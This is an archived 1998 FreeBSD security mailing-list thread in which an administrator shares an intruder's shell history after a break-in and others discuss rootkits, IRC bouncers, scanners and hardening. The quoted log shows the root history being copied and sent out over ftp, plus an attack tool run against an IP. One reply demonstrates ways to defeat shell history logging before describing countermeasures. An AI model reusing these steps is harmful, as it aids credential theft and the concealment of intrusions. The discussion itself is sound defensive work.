.. > cd local > ls > cd .. > ls > cd /dev > ls -la > tail zero > tail /root/.bash_history > cd /root > cp .bash_history h > ftp bugs.mc.duke.edu > rm h > cd /dev > cd sync > ls > tail bnc.conf > exit > cd /usr/games > ls > cd hack > cd hide > ls > ls -la > ./hack > ls > cd /dev/sync > ls > ls -la > cd .. > tail ptya > locate irc > irc > BitchX > cd sync > ls > tail bnc.conf > telnet linuxppc.org > telnet irc.686.org > telnet irc686.com > telnet irc.686.com > who > telnet onyx.eng.sunysb.edu > telnet irc.686.com 90210 > telnet declan.bio.columbia.edu > telnet sleepy.uncg.edu > telnet sleepy.uncg.edu > telnet desoto.coosavalley.net > telnet 209.16.220.8 > telnet ramsis.spd.louisville.edu > telnet nuptse.knowledge2000.com > telnet ramses.spd.louisville.edu > telnet cc607580-a.hwrd1.md.home.com > pico > tail /root/.bash_history > ls > uptime > cd root > ls > tail .rhosts > tail /etc/hosts.equiv > cd /var/named > cd var > ls > cd /var > ls > telnet STARLIGHT1.DIGITALSTARLIGHT.COM > uname -a > telnet www.cylatech.com > rlogin -l ui8765 www.cylatech.com > ls > uname -a > ftp bugs.mc.duke.edu > gcc > gcc -o bmb bmb.c > ls > ./bmb 207.153.39.89 23 > ls > rm bmb* > ls > exit > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 00:44:20 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id AAA27592 for freebsd-security-outgoing; Thu, 27 Aug 1998 00:44:20 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from banshee.cs.uow.edu.au (banshee.cs.uow.edu.au [130.130.188.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id AAA27585 for ; Thu, 27 Aug 1998 00:44:13 -0700 (PDT) (envelope-from ncb05@banshee.cs.uow.edu.au) Received: (from ncb05@localhost) by banshee.cs.uow.edu.au (8.9.1/8.9.1) id RAA17401; Thu, 27 Aug 1998 17:43:05 +1000 (EST) Date: Thu, 27 Aug 1998 17:43:04 +1000 (EST) From: Nicholas Charles Brawn X-Sender: ncb05@banshee.cs.uow.edu.au To: Wilson MacGyver cc: security@FreeBSD.ORG Subject: Re: post breakin log In-Reply-To: <199808270538.BAA01341@armitage.cylatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 27 Aug 1998, Wilson MacGyver wrote: > Hi guys, > > My FreeBSD box get hacked about two days ago... yes yes, via the popper. > I reinstalled the system, but saved the log. I was looking through to > see what he has done. There is some stuff you may find interesting... > > the log from history follows. > > >From the log, it seem he is very knowledgeable about FreeBSD. > though I must admit, I don't get why he makes the /dev/sync. > also, I don't know what the deal with the bnc* stuff If you have a log, he can't be that knowledgeable. A few simple ways of avoiding history logs include: evil@crescent:~$ echo $SHELL /usr/local/bin/bash evil@crescent:~$ ls .bash_history -rw-r--r-- 1 evil evil 904 Aug 27 04:06 .bash_history evil@crescent:~$ rm .bash_history evil@crescent:~$ ln -s /dev/null .bash_history evil@crescent:~$ ls .bash_history lrwxrwxrwx 1 evil evil 9 Aug 27 17:42 .bash_history@ -> /dev/null evil@crescent:~$ All logs will be sent to /dev/null. Another way (for bash at least), would be to export HISTFILESIZE=0. And don't forget what we can do with chflags on bsd: evil@crescent:~$ rm .bash_history evil@crescent:~$ touch .bash_history evil@crescent:~$ chflags uchg .bash_history evil@crescent:~$ ls -lo .bash_history -rw-r--r-- 1 evil evil uchg 0 Aug 27 17:44 .bash_history evil@crescent:~$ echo blah > .bash_history su: .bash_history: Operation not permitted evil@crescent:~$ Now, how can you prevent nefarious users doing the above? Using bash as an example, setup a .profile and .bashrc that and chflags them sappnd. Do the same to .bash_history. I'm sure you can think of how to do similar things with different shells. > He installed a backdoor on my system, and then attack a bunch > of systems while he was on. He even has a freebsd root kit. :) ^^^^^^^^^^^^^^^^ Trademark of a script kiddy. People you should worry about are those with custom stealth lkm's and other nastyness. > any suggestion to prevent futher break in is apprecaited. > other than "not to run popper" anymore. (grin) If you must allow shell access, limit it accordingly. You may want to look at a small patch that prevents users executing binaries in untrusted directories - http://rabble.uow.edu.au/~nick/security/tpe.stable.diff. > has anyone seen some of these programs he ran/install/compile > before? > > Thanks, > Mac > [ history removed ] Hope the cleanup isn't to bad. :) Nick -- Email: ncb05@uow.edu.au - http://rabble.uow.edu.au/~nick Key fingerprint = DE 30 33 D3 16 91 C8 8D A7 F8 70 03 B7 77 1A 2A "When in doubt, ask someone wiser than yourself..." -unknown To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 01:05:36 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA00536 for freebsd-security-outgoing; Thu, 27 Aug 1998 01:05:36 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Dolinca.IBC.IskraSistemi.Si (Dolinca.IBC.IskraSistemi.Si [194.249.213.150]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA00531 for ; Thu, 27 Aug 1998 01:05:32 -0700 (PDT) (envelope-from brodnik@Dolinca.IBC.IskraSistemi.Si) Received: (from brodnik@localhost) by Dolinca.IBC.IskraSistemi.Si (8.8.8/8.8.7) id KAA19107; Thu, 27 Aug 1998 10:08:12 +0200 (CEST) (envelope-from brodnik) From: Andrej Brodnik (Andy) Message-Id: <199808270808.KAA19107@Dolinca.IBC.IskraSistemi.Si> Subject: Re: post breakin log In-Reply-To: <1143.904199171@time.cdrom.com> from "Jordan K. Hubbard" at "Aug 26, 98 11:26:11 pm" To: jkh@time.cdrom.com (Jordan K. Hubbard) Date: Thu, 27 Aug 1998 10:08:12 +0200 (CEST) Cc: security@FreeBSD.ORG Organization: IBC, Iskra Systems Reply-To: Andrej.Brodnik@IBC.IskraSistemi.Si (Andrej Brodnik (Andy)) X-Mailer: ELM [version 2.4ME+ PL31 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > To: Wilson MacGyver > Subject: Re: post breakin log > Date: Wed, 26 Aug 1998 23:26:11 -0700 > Watch bugtrax, www.rootshell.org, CERT, etc. Actively admin your > system on a daily basis. Is there a site one can read more on this? > Those of us who do so were never hacked via > popper or generally fall prey to the usual hack of the month (my > popper was turned off no more than 2 hours after the first reports > started, erm, "popping" up on the net). Ok, and how are the users accesing their mail then? LPA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 01:28:25 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA03747 for freebsd-security-outgoing; Thu, 27 Aug 1998 01:28:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from armitage.cylatech.com (armitage.cylatech.com [206.31.213.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA03742 for ; Thu, 27 Aug 1998 01:28:24 -0700 (PDT) (envelope-from macgyver@armitage.cylatech.com) Received: (from macgyver@localhost) by armitage.cylatech.com (8.8.8/8.8.8) id EAA04356; Thu, 27 Aug 1998 04:29:27 -0400 (EDT) (envelope-from macgyver) From: Wilson MacGyver Message-Id: <199808270829.EAA04356@armitage.cylatech.com> Subject: Re: post breakin log In-Reply-To: <199808270808.KAA19107@Dolinca.IBC.IskraSistemi.Si> from Andrej Brodnik at "Aug 27, 98 10:08:12 am" To: Andrej.Brodnik@IBC.IskraSistemi.Si Date: Thu, 27 Aug 1998 04:29:27 -0400 (EDT) Cc: security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > To: Wilson MacGyver > > Subject: Re: post breakin log > > Date: Wed, 26 Aug 1998 23:26:11 -0700 > > > Watch bugtrax, www.rootshell.org, CERT, etc. Actively admin your > > system on a daily basis. > > Is there a site one can read more on this? www.cert.org, www.rootsheel.org, bugtrax is a mailing list. > > Those of us who do so were never hacked via > > popper or generally fall prey to the usual hack of the month (my > > popper was turned off no more than 2 hours after the first reports > > started, erm, "popping" up on the net). > > Ok, and how are the users accesing their mail then? using the new popper, or use imapd-wu (which I think doesn't have this problem...) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 01:39:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA05283 for freebsd-security-outgoing; Thu, 27 Aug 1998 01:39:31 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA05274 for ; Thu, 27 Aug 1998 01:39:29 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id KAA15674; Thu, 27 Aug 1998 10:44:25 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk) Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id KAA15633; Thu, 27 Aug 1998 10:48:43 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id KAA14417; Thu, 27 Aug 1998 10:38:15 +0200 (CEST) Message-ID: <19980827103815.51594@deepo.prosa.dk> Date: Thu, 27 Aug 1998 10:38:15 +0200 From: Philippe Regnauld To: Wilson MacGyver , security@FreeBSD.ORG Subject: Re: post breakin log References: <199808270538.BAA01341@armitage.cylatech.com> <1143.904199171@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88e In-Reply-To: <1143.904199171@time.cdrom.com>; from Jordan K. Hubbard on Wed, Aug 26, 1998 at 11:26:11PM -0700 X-Operating-System: FreeBSD 2.2.6-RELEASE i386 Phone: +45 3336 4148 Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jordan K. Hubbard writes: > > Every 14 year old kid too young to drive or grow pubic hair has a > FreeBSD rootkit. That's nothing particularly special or noteworthy > these days, I hate to say. :) Right. I hate to repeat it, but 99% of attacks today are scr1pt k1ddies. The rest you don't find. I mean, when someone successfully breaks into a machine (i.e.: Linux), successfully installs RootKit3 (the one that includes "shadowing" configuration files to hide entries in ls,ps, etc...) and then goes to run an IRC robot + sniffer really has no clue. The problem is these kinds of attacks: - make a lot of noise - increase the alertness/work ratio of new sysadmins - make it more difficult to trace more subtle attacks For a good starting point: http://www.ugu.com/sui/ugu/show?I=admin.security&F=1111111111&G=Y -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- The Internet is busy. Please try again later. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 01:41:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA05542 for freebsd-security-outgoing; Thu, 27 Aug 1998 01:41:04 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA05536 for ; Thu, 27 Aug 1998 01:41:01 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id KAA15783; Thu, 27 Aug 1998 10:45:46 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk) Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id KAA15640; Thu, 27 Aug 1998 10:50:04 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id KAA14473; Thu, 27 Aug 1998 10:39:36 +0200 (CEST) Message-ID: <19980827103936.44211@deepo.prosa.dk> Date: Thu, 27 Aug 1998 10:39:36 +0200 From: Philippe Regnauld To: "Craig H. Rowland" Cc: Wilson MacGyver , security@FreeBSD.ORG Subject: Re: post breakin log References: <199808270538.BAA01341@armitage.cylatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88e In-Reply-To: ; from Craig H. Rowland on Thu, Aug 27, 1998 at 01:31:03AM -0400 X-Operating-System: FreeBSD 2.2.6-RELEASE i386 Phone: +45 3336 4148 Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Craig H. Rowland writes: > > Shameless plug: I wrote a quick page a while back describing some of the > more common attacks I've seen against hosts. It may contain some useful > information for you: > > http://www.psionic.com/papers/attacks.html One might want to check out the May issue of ;login: which includes an overview of common network attacks, by Aleph One (Bugtraq moderator). -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- The Internet is busy. Please try again later. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 01:43:01 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA05954 for freebsd-security-outgoing; Thu, 27 Aug 1998 01:43:01 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA05919 for ; Thu, 27 Aug 1998 01:42:44 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id KAA15916; Thu, 27 Aug 1998 10:47:34 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk) Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id KAA15648; Thu, 27 Aug 1998 10:51:52 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id KAA14579; Thu, 27 Aug 1998 10:41:24 +0200 (CEST) Message-ID: <19980827104124.44612@deepo.prosa.dk> Date: Thu, 27 Aug 1998 10:41:24 +0200 From: Philippe Regnauld To: Nicholas Charles Brawn Cc: Wilson MacGyver , security@FreeBSD.ORG Subject: Re: post breakin log References: <199808270538.BAA01341@armitage.cylatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88e In-Reply-To: ; from Nicholas Charles Brawn on Thu, Aug 27, 1998 at 05:43:04PM +1000 X-Operating-System: FreeBSD 2.2.6-RELEASE i386 Phone: +45 3336 4148 Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nicholas Charles Brawn writes: > > If you have a log, he can't be that knowledgeable. A few simple ways of > avoiding history logs include: Ahem. I've even had people breaking in, rm'ing the .bash_history, and just logging out -- not knowing that bash writes out the history on HUP... Duh. 14 year old seems generous :-) -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- The Internet is busy. Please try again later. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 01:56:00 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA08379 for freebsd-security-outgoing; Thu, 27 Aug 1998 01:56:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from time.cdrom.com (time.cdrom.com [204.216.27.226]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id BAA08374 for ; Thu, 27 Aug 1998 01:55:58 -0700 (PDT) (envelope-from jkh@time.cdrom.com) Received: from time.cdrom.com (jkh@localhost.cdrom.com [127.0.0.1]) by time.cdrom.com (8.8.8/8.8.8) with ESMTP id BAA07710; Thu, 27 Aug 1998 01:54:48 -0700 (PDT) (envelope-from jkh@time.cdrom.com) To: Andrej.Brodnik@IBC.IskraSistemi.Si (Andrej Brodnik (Andy)) cc: security@FreeBSD.ORG Subject: Re: post breakin log In-reply-to: Your message of "Thu, 27 Aug 1998 10:08:12 +0200." <199808270808.KAA19107@Dolinca.IBC.IskraSistemi.Si> Date: Thu, 27 Aug 1998 01:54:48 -0700 Message-ID: <7706.904208088@time.cdrom.com> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Watch bugtrax, www.rootshell.org, CERT, etc. Actively admin your > > system on a daily basis. > > Is there a site one can read more on this? Not to my knowledge. Alta Vista or your search engine of choice is highly recommended. :) > Ok, and how are the users accesing their mail then? While this particular problem existed, they either used cuipopper or they just didn't get their mail via pop until the problem was fixed. - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 03:00:09 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA17274 for freebsd-security-outgoing; Thu, 27 Aug 1998 03:00:09 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beeblebrox.cc.jyu.fi (beeblebrox.cc.jyu.fi [130.234.41.34]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA17208 for ; Thu, 27 Aug 1998 03:00:03 -0700 (PDT) (envelope-from kallio@beeblebrox.cc.jyu.fi) Received: (from kallio@localhost) by beeblebrox.cc.jyu.fi (8.8.7/8.8.7) id NAA00643; Thu, 27 Aug 1998 13:04:01 +0300 Message-ID: <19980827130401.B546@beeblebrox.cc.jyu.fi> Date: Thu, 27 Aug 1998 13:04:01 +0300 From: Seppo Kallio To: Philippe Regnauld , "Craig H. Rowland" Cc: Wilson MacGyver , security@FreeBSD.ORG Subject: Re: post breakin log (Saint/Nessus/?) References: <199808270538.BAA01341@armitage.cylatech.com> <19980827103936.44211@deepo.prosa.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.91.1 In-Reply-To: <19980827103936.44211@deepo.prosa.dk>; from Philippe Regnauld on Thu, Aug 27, 1998 at 10:39:36AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Aug 27, 1998 at 10:39:36AM +0200, Philippe Regnauld wrote: > Craig H. Rowland writes: > > > > Shameless plug: I wrote a quick page a while back describing some of the > > more common attacks I've seen against hosts. It may contain some useful > > information for you: > > > > http://www.psionic.com/papers/attacks.html > > One might want to check out the May issue of ;login: which > includes an overview of common network attacks, by Aleph One (Bugtraq > moderator). Is there good tools to make a check if my (or neighbour's) node has good security or not? I think in principle that kind of tool is possible, but it should be updatet daily and easy to use (so that I can run it daily). We are managing 10-20 Sun/Linux/FreeBSD nodes at cc, AND a lot of University staff have Linux/Sun workstations. Some simple tool to check our nodes and the nodes of the professors could be very nice! I have head about http://www.wwdsi.com/saint/ (Saint) and http://www.nessus.org/ (Nessus) how are they? Experiences? I think the app should have (secure) database somewhere in net to check the bug free popper version number for example. Or easy automatic local database update (by 'mirror' or something). -- Seppo Kallio kallio@cc.jyu.fi http://www.jyu.fi/~kallio To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 03:29:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA20590 for freebsd-security-outgoing; Thu, 27 Aug 1998 03:29:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from mail.ftf.dk (mail.ftf.dk [129.142.64.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA20581 for ; Thu, 27 Aug 1998 03:29:51 -0700 (PDT) (envelope-from regnauld@deepo.prosa.dk) Received: from mail.prosa.dk ([192.168.100.254]) by mail.ftf.dk (8.8.8/8.8.8/gw-ftf-1.0) with ESMTP id MAA24073; Thu, 27 Aug 1998 12:34:47 +0200 (CEST) (envelope-from regnauld@deepo.prosa.dk) Received: from deepo.prosa.dk (deepo.prosa.dk [192.168.100.10]) by mail.prosa.dk (8.8.8/8.8.5/prosa-1.1) with ESMTP id MAA15832; Thu, 27 Aug 1998 12:39:06 +0200 (CEST) Received: (from regnauld@localhost) by deepo.prosa.dk (8.8.8/8.8.5/prosa-1.1) id MAA22530; Thu, 27 Aug 1998 12:28:38 +0200 (CEST) Message-ID: <19980827122838.09246@deepo.prosa.dk> Date: Thu, 27 Aug 1998 12:28:38 +0200 From: Philippe Regnauld To: Seppo Kallio Cc: security@FreeBSD.ORG Subject: Re: post breakin log (Saint/Nessus/?) References: <199808270538.BAA01341@armitage.cylatech.com> <19980827103936.44211@deepo.prosa.dk> <19980827130401.B546@beeblebrox.cc.jyu.fi> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.88e In-Reply-To: <19980827130401.B546@beeblebrox.cc.jyu.fi>; from Seppo Kallio on Thu, Aug 27, 1998 at 01:04:01PM +0300 X-Operating-System: FreeBSD 2.2.6-RELEASE i386 Phone: +45 3336 4148 Address: Ahlefeldtsgade 16, 1359 Copenhagen K, Denmark Organization: PROSA Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Seppo Kallio writes: > > Is there good tools to make a check if my (or neighbour's) node has good > security or not? I think in principle that kind of tool is possible, but > it should be updatet daily and easy to use (so that I can run it daily). From the inside: COPS (a bit outdated) From the network: Check out SAINT, Nessus. TAMU Drawbridge NFR (this is more of a toolkit than a plug-n-play program) Commercial: ISS Scanner But mostly: good security practices :-) Check out - Robert Watson's excellent work on FreeBSD, including his hardening project: http://www.watson.org/fbsd-hardening/ - Jan Koum's FreeBSD security HowTo: http://www.best.com/~jkb/howto.txt - Guy Helmer wrote a good article in Sysadmin (can't find the URL right now), "Security tools in FreeBSD" I have available on demand a biblio. list of a few hundred (500-600) references security articles/books/papers (courtesy of Osiris@pacific.net) > Some simple tool to check our nodes and the nodes of the professors could be > very nice! Unplug them from the net :-) > I have head about http://www.wwdsi.com/saint/ (Saint) and > http://www.nessus.org/ (Nessus) how are they? Experiences? Saint is more to do verifications, it picks up where SATAN left off (and indeed uses the same interface) Nessus is more denial-of-service (indeed, it will take down anything Microsoft-related, and most commercial OSes without patches), and intrusion oriented. > I think the app should have (secure) database somewhere in net to > check the bug free popper version number for example. Or easy automatic > local database update (by 'mirror' or something). Then you want ISS scanner. -- -[ Philippe Regnauld / sysadmin / regnauld@deepo.prosa.dk / +55.4N +11.3E ]- The Internet is busy. Please try again later. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 04:38:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA28872 for freebsd-security-outgoing; Thu, 27 Aug 1998 04:38:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c079.moon.jic.com [206.156.18.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA28867 for ; Thu, 27 Aug 1998 04:38:27 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (gjp@localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id HAA10513; Thu, 27 Aug 1998 07:36:59 -0400 (EDT) (envelope-from gjp@gjp.erols.com) X-Mailer: exmh version 2.0.1 12/23/97 To: Wilson MacGyver cc: security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: post breakin log In-reply-to: Your message of "Thu, 27 Aug 1998 01:38:37 EDT." <199808270538.BAA01341@armitage.cylatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 27 Aug 1998 07:36:59 -0400 Message-ID: <10509.904217819@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Wilson MacGyver wrote in message ID <199808270538.BAA01341@armitage.cylatech.com>: > From the log, it seem he is very knowledgeable about FreeBSD. > though I must admit, I don't get why he makes the /dev/sync. > also, I don't know what the deal with the bnc* stuff Where better to hide something than in a directory filled with stuff no-one looks at? And even if they did look at, then they'd never remember if it was there or not before :) bnc is probably a backdoor program running on a different port Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 04:46:15 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id EAA29921 for freebsd-security-outgoing; Thu, 27 Aug 1998 04:46:15 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gjp.erols.com (alex-va-n008c079.moon.jic.com [206.156.18.89]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id EAA29905 for ; Thu, 27 Aug 1998 04:46:10 -0700 (PDT) (envelope-from gjp@gjp.erols.com) Received: from gjp.erols.com (gjp@localhost.erols.com [127.0.0.1]) by gjp.erols.com (8.8.8/8.8.7) with ESMTP id HAA10634; Thu, 27 Aug 1998 07:45:17 -0400 (EDT) (envelope-from gjp@gjp.erols.com) X-Mailer: exmh version 2.0.1 12/23/97 To: Seppo Kallio cc: security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: post breakin log (Saint/Nessus/?) In-reply-to: Your message of "Thu, 27 Aug 1998 13:04:01 +0300." <19980827130401.B546@beeblebrox.cc.jyu.fi> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 27 Aug 1998 07:45:16 -0400 Message-ID: <10629.904218316@gjp.erols.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Seppo Kallio wrote in message ID <19980827130401.B546@beeblebrox.cc.jyu.fi>: > We are managing 10-20 Sun/Linux/FreeBSD nodes at cc, > AND a lot of University staff have Linux/Sun workstations. Put the staff machines behind a strong firewall/bastion host so that they can't run `services'. Without services, the machines are inpenetrable (unless your firewall box gets hacked). Then you don't have to care what they run, unless you're worried about them hacking each other :) Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 05:18:17 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA03406 for freebsd-security-outgoing; Thu, 27 Aug 1998 05:18:17 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from speedy.nethampton.com (speedy.nethampton.com [207.252.75.40]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id FAA03390 for ; Thu, 27 Aug 1998 05:18:10 -0700 (PDT) (envelope-from tplatt@nethampton.com) Date: Thu, 27 Aug 1998 05:18:10 -0700 (PDT) Received: (qmail 12232 invoked from network); 27 Aug 1998 12:14:56 -0000 Received: from teebee.hamptons.com (HELO ?204.141.112.245?) (204.141.112.245) by speedy.nethampton.com with SMTP; 27 Aug 1998 12:14:56 -0000 X-Sender: tplatt@nethampton.com (Unverified) Message-Id: In-Reply-To: References: <199808270538.BAA01341@armitage.cylatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Nicholas Charles Brawn From: "Timothy R. Platt" Subject: Re: post breakin log Cc: security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >On Thu, 27 Aug 1998, Wilson MacGyver wrote: > >> Hi guys, >> >> My FreeBSD box get hacked about two days ago... yes yes, via the popper. >> I reinstalled the system, but saved the log. I was looking through to >> see what he has done. There is some stuff you may find interesting... >> >> the log from history follows. >> >> >From the log, it seem he is very knowledgeable about FreeBSD. >> though I must admit, I don't get why he makes the /dev/sync. >> also, I don't know what the deal with the bnc* stuff bnc, or bounce, allows people to bounce irc sessions off your server.. ie they sit at home with their mirc running, connect to your machine which relays to an irc server.. thus producing your.compromised.server.com as their hostname on irc. Funny thing is, if you have any decent logging, you can log their IP. Tim To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 27 09:22:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA02751 for freebsd-security-outgoing; Thu, 27 Aug 1998 09:22:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from the.oneinsane.net (gw.oneinsane.net [207.113.133.226]) by hub.freebsd.org 